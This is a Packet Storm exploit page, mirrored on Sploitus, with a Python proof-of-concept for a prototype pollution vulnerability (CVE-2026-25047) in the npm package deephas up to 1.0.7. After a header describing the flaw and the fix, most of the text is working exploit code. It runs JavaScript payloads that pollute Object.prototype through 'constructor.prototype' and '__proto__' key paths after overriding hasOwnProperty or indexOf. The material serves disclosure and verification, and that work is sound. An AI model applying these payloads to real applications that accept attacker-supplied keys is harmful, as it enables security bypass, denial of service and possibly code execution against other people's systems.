Share
## https://sploitus.com/exploit?id=PACKETSTORM:220372
# Exploit Title: deephas 1.0.7 - Prototype Pollution 
    # Google Dork: N/A
    # Date: 2026-02-01
    # Exploit Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Instagram: @banyamer_security
    # Vendor Homepage: https://www.npmjs.com/package/deephas
    # Software Link: https://github.com/sharpred/deepHas
    # Version: <= 1.0.7 (fixed in 1.0.8 and later)
    # Tested on: Node.js 16 / 18 / 20 (Linux / macOS / Windows)
    # CVE : CVE-2026-25047
    # GHSA: GHSA-2733-6c58-pf27
    # CVSS: 9.8 (Critical)
    #
    # Description:
    #   The 'deephas' npm package suffers from a prototype pollution vulnerability
    #   in versions 1.0.7 and below due to unsafe recursive property assignment
    #   without proper hasOwnProperty checks and inadequate path sanitization.
    #
    #   An attacker who can supply arbitrary keys to deephas.set() can pollute
    #   Object.prototype โ€” which may lead to:
    #     โ€ข Remote code execution (when polluting sensible properties like
    #       process.env, require.extensions, child_process, etc.)
    #     โ€ข Denial of Service
    #     โ€ข Security bypass (when polluting hasOwnProperty, toString, etc.)
    #     โ€ข Privilege escalation in sandboxed / vm2-like environments
    #
    #   This PoC demonstrates pollution of Object.prototype via two techniques:
    #     1. constructor.prototype path + hasOwnProperty bypass
    #     2. __proto__ path + indexOf bypass
    #
    #   References:
    #     โ€ข https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27
    #     โ€ข https://nvd.nist.gov/vuln/detail/CVE-2026-25047
    #
    # Usage:
    #   1. npm install deephas@1.0.7
    #   2. python3 poc-deephas-prototype-pollution.py
    #
    # Remediation:
    #   Upgrade to deephas >= 1.0.8
    #
    
    import subprocess
    import os
    import textwrap
    import sys
    import shutil
    
    
    def run_js(code: str) -> tuple[bool, str, str]:
        """Execute JavaScript code snippet via Node.js and capture output"""
        tmp_file = "poc-deephas-temp.js"
    
        try:
            with open(tmp_file, "w", encoding="utf-8") as f:
                f.write(code.strip())
    
            result = subprocess.run(
                ["node", tmp_file],
                capture_output=True,
                text=True,
                timeout=10,
                check=False
            )
    
            return (
                result.returncode == 0,
                result.stdout.strip(),
                result.stderr.strip()
            )
    
        except FileNotFoundError:
            return False, "", "Node.js not found. Please install Node.js."
        except subprocess.TimeoutExpired:
            return False, "", "Execution timed out."
        except Exception as e:
            return False, "", f"Error: {str(e)}"
        finally:
            if os.path.exists(tmp_file):
                try:
                    os.remove(tmp_file)
                except:
                    pass
    
    
    def show_result(name: str, success: bool, stdout: str, stderr: str):
        print(f"{'โ”€' * 10} {name} {'โ”€' * 10}")
        if not success:
            print("STATUS : FAILED")
            if stderr:
                print("ERROR  :", stderr.splitlines()[0] if stderr.splitlines() else stderr)
            else:
                print("(no error message captured)")
        else:
            polluted = any(x in stdout.lower() for x in ["yes!!!", "hacked", "polluted"])
            status = "VULNERABLE (pollution successful)" if polluted else "UNEXPECTED RESULT"
            print(f"STATUS : {status}")
            print()
            for line in stdout.splitlines():
                print(f"  {line}")
        print("โ”€" * 70)
        print()
    
    
    def main():
        print("=" * 70)
        print(" deephas <= 1.0.7 โ€“ Prototype Pollution PoC")
        print(" CVE-2026-25047 / GHSA-2733-6c58-pf27")
        print("=" * 70)
        print()
    
        if not shutil.which("node"):
            print("Error: Node.js is required but not found in PATH.")
            sys.exit(1)
    
        print("[*] Make sure you have installed the vulnerable version:")
        print("    npm install deephas@1.0.7\n")
    
        # โ”€โ”€ PoC 1: constructor.prototype + hasOwnProperty bypass โ”€โ”€โ”€โ”€โ”€โ”€โ”€
        poc1 = textwrap.dedent("""\
            Object.prototype.hasOwnProperty = () => true;
    
            const has = require('deephas');
            const obj = {};
            has.set(obj, 'constructor.prototype.poc1', 'yes!!!');
    
            console.log('obj.poc1          โ†’', obj.poc1);
            console.log('{}.poc1           โ†’', {}.poc1);
            console.log('polluted global?  โ†’', {}.poc1 === 'yes!!!');
        """)
    
        ok1, out1, err1 = run_js(poc1)
        show_result("PoC 1 โ€“ constructor.prototype pollution", ok1, out1, err1)
    
        # โ”€โ”€ PoC 2: __proto__ + indexOf bypass โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
        poc2 = textwrap.dedent("""\
            String.prototype.indexOf = () => -1;
    
            const has = require('deephas');
            const obj = {};
            has.set(obj, '__proto__.poc2', 'HACKED');
    
            console.log('obj.poc2          โ†’', obj.poc2);
            console.log('{}.poc2           โ†’', {}.poc2);
            console.log('polluted global?  โ†’', {}.poc2 === 'HACKED');
        """)
    
        ok2, out2, err2 = run_js(poc2)
        show_result("PoC 2 โ€“ __proto__ + indexOf bypass", ok2, out2, err2)
    
        print(" " * 20 + "SUMMARY".center(30, "โ”€"))
        print("If you see 'yes!!!' or 'HACKED' printed from {}.xxx property")
        print("โ†’ deephas@1.0.7 is VULNERABLE to prototype pollution.")
        print()
        print("Fix: Upgrade to deephas >= 1.0.8")
        print("=" * 70)
    
    
    if __name__ == "__main__":
        main()